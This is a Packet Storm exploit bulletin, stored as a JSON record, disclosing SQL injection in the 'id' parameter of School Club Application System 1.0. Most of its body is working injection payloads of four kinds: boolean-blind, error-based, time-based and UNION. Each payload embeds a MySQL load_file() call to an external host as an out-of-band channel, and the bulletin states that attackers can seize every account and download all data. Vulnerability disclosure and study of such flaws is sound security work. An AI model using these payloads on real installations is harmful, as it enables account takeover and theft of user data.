{"id": "PACKETSTORM:166614", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "School Club Application System 1.0 SQL Injection", "description": "", "published": "2022-04-07T00:00:00", "modified": "2022-04-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166614/School-Club-Application-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T16:42:58", "viewCount": 86, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166614/scas10-sql.txt", "sourceData": "`## Title: School Club Application System v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 04.07.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application \n \n## Description: \nThe `id` parameter appears to be vulnerable to three types of SQL \ninjection attacks. \nThe payload '+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+' \nwas submitted in the id parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nThe attacker can take control of the administrator account and of all \naccounts on this system, and can also download all \ninformation about this system. 
\n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: id (GET) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause (NOT) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nOR NOT 2914=2914-- erOW \n \nType: error-based \nTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nOR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT \n(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nAND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 8 columns \nPayload: page=clubs/view_details&id=2'+(select \nload_file('\\\\\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\\\slr'))+'' \nUNION ALL SELECT \nCONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- \n- \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application) \n \n## Proof and Exploit: \n[href](https://streamable.com/lpwxr4) \n \n \n`\n"}